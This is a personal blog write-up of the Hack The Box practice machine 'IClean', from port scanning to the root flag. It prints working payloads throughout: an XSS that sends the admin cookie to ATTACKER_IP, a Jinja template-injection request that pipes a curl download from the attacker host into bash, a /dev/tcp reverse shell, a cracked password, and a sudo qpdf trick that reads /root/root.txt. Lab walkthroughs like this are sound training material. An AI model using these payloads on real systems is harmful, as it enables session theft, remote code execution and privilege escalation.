Home

IClean – Hack The Box – @lautarovculic

, , , , , , , ,

User.txt

First, we will discover which ports are open.

				
					sudo nmap -sS --min-rate 5000  -n -Pn -T4 -vv -sV 10.10.11.12

Output:

				
					PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))

If we go to clean.htb we will redirect to capiclean.htb

Then we will add the host to our /etc/hosts file

				
					echo "10.10.11.12 capiclean.htb" | sudo tee -a /etc/hosts

After enum with gobuster this is the result:

				
					gobuster dir -u http://capiclean.htb/ -w /home/lautaro/Desktop/tools/zDirb/common.txt
				
			
				
					/about                (Status: 200) [Size: 5267]
/dashboard            (Status: 302) [Size: 189] [--> /]
/login                (Status: 200) [Size: 2106]
/logout               (Status: 302) [Size: 189] [--> /]
/quote                (Status: 200) [Size: 2237]
/server-status        (Status: 403) [Size: 278]
/services             (Status: 200) [Size: 8592]
/team                 (Status: 200) [Size: 8109]

I think that the way is via /dashboard

After some research, if we go at the end of the page in **http://capiclean.htb/choose**

We can see “get a quote” link.

This is the page

				
					http://capiclean.htb/quote

Let’s intercept the request with burpsuite

				
					POST /sendMessage HTTP/1.1
Host: capiclean.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Origin: http://capiclean.htb
Connection: close
Referer: http://capiclean.htb/quote
Upgrade-Insecure-Requests: 1

service=Carpet+Cleaning&service=Tile+%26+Grout&service=Office+Cleaning&email=lautaro%40htb.com

After try, I notice that we can execute a XSS for get the document.cookie

We need up a simple http.server

				
					python3 -m http.server 8081

And here the payload:

				
					POST /sendMessage HTTP/1.1
Host: capiclean.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://capiclean.htb
Connection: close
Referer: http://capiclean.htb/quote
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 125

service=%3Cimg%20src%3Dx%20onerror%3Dthis.src%3D%22http%3A%2F%2FATTACKER_IP0%3A8081%2F%22%2Bbtoa%28document.cookie%29%3E%20

Change ATTACKER_IP to your VPN IP.

You will get this request:

				
					GET /c2Vzc2lvbj1leUp5YjJ4bElqb2lNakV5TXpKbU1qazNZVFUzWVRWaE56UXpPRGswWVRCbE5HRTRNREZtWXpNaWZRLlpoSHFZQS5iYV90cTFfY0tJZGhEdWs5c3NFbnFPM0Zadnc=

Decode the base64

				
					echo "c2Vzc2lvbj1leUp5YjJ4bElqb2lNakV5TXpKbU1qazNZVFUzWVRWaE56UXpPRGswWVRCbE5HRTRNREZtWXpNaWZRLlpoSHFZQS5iYV90cTFfY0tJZGhEdWs5c3NFbnFPM0Zadnc=" | base64 -d

And use the cookie.

Now you can go to /dashboard admin panel.

Notice that we have new endpoints

				
					/QuoteRequests
/EditServices
/QRGenerator
/InvoiceGenerator

Creating a Invoice in /InvoiceGenerator

Get the number

Go to /QRGenerator

Paste the number

And in the qr_link param you can find the SSTI

Here’s a burpsuite request:

				
					POST /QRGenerator HTTP/1.1
Host: capiclean.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://capiclean.htb
Connection: close
Referer: http://capiclean.htb/QRGenerator
Cookie: session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhH-bA.kshZxFtQUwzvT6nBmfoQA1_KBl8
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

invoice_id=&form_type=scannable_invoice&qr_link={{2*2}}

And in the end of the response

				
					<div class="qr-code-container"><div class="qr-code"><img decoding="async" src="data:image/png;base64,4" alt="QR Code"></div>
</body>
</html>

We can see that the SSTI work (src=”data:image/png;base64,4“)

Then we can do an RCE with

				
					nc -lnvp 1337

Then you can make an index.html

				
					echo 'bash -i >& /dev/tcp/YOUR_ATTACKER_IP/1337 0>&1' > index.html

Set a simple server

				
					python3 -m http.server 8082

And here you can get the request for trigger the rev shell:

				
					POST /QRGenerator HTTP/1.1
Host: capiclean.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://capiclean.htb
Connection: close
Referer: http://capiclean.htb/QRGenerator
Cookie: session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhH-bA.kshZxFtQUwzvT6nBmfoQA1_KBl8
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 278

invoice_id=&form_type=scannable_invoice&qr_link={%25+with+a+%3d+request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("curl+http%3a//YOUR_ATTACKER_IP%3a8082/index.html+|+bash")["read"]()+%25}+{{+a+}}+{%25+endwith+%25}

Now we are www-data

Upgrade the shell with python:

				
					python3 -c 'import pty; pty.spawn("/bin/bash")'

In the file app.py we can found this credentials:

				
					# Database Configuration
db_config = {
    'host': '127.0.0.1',
    'user': 'iclean',
    'password': 'pxCsmnGLckUb',
    'database': 'capiclean'
}

Then

				
					mysql -u iclean -p

Enter the password and

				
					use capiclean

Then

				
					select * from users;

And we will get this:

				
					+----+----------+------------------------------------------------------------------+----------------------------------+
| id | username | password                                                         | role_id                          |
+----+----------+------------------------------------------------------------------+----------------------------------+
|  1 | admin    | 2ae316f10d49222f369139ce899e414e57ed9e339bb75457446f2ba8628a6e51 | 21232f297a57a5a743894a0e4a801fc3 |
|  2 | consuela | 0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa | ee11cbb19052e40b07aac0ca060c23ee |
+----+----------+------------------------------------------------------------------+----------------------------------+

We will use the consuela hash in crackstation

https://crackstation.net/

				
					0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa

And the password is

				
					simple and clean

Then login vía ssh and get the user flag

				
					consuela@iclean:~$ cat user.txt
01633bc29d2************0f34b
consuela@iclean:~$

Root.txt

After research about qpdf and how it’s work, with my team found a way to get the root.txt content

Just create a .txt file and exec this command:

				
					sudo qpdf --replace-input "lautaro.txt" @/root/root.txt

Output:

				
					qpdf: unknown argument 7dd6a**************58fc803af6

I hope you found it useful (:

Leave a Reply

Your email address will not be published. Required fields are marked *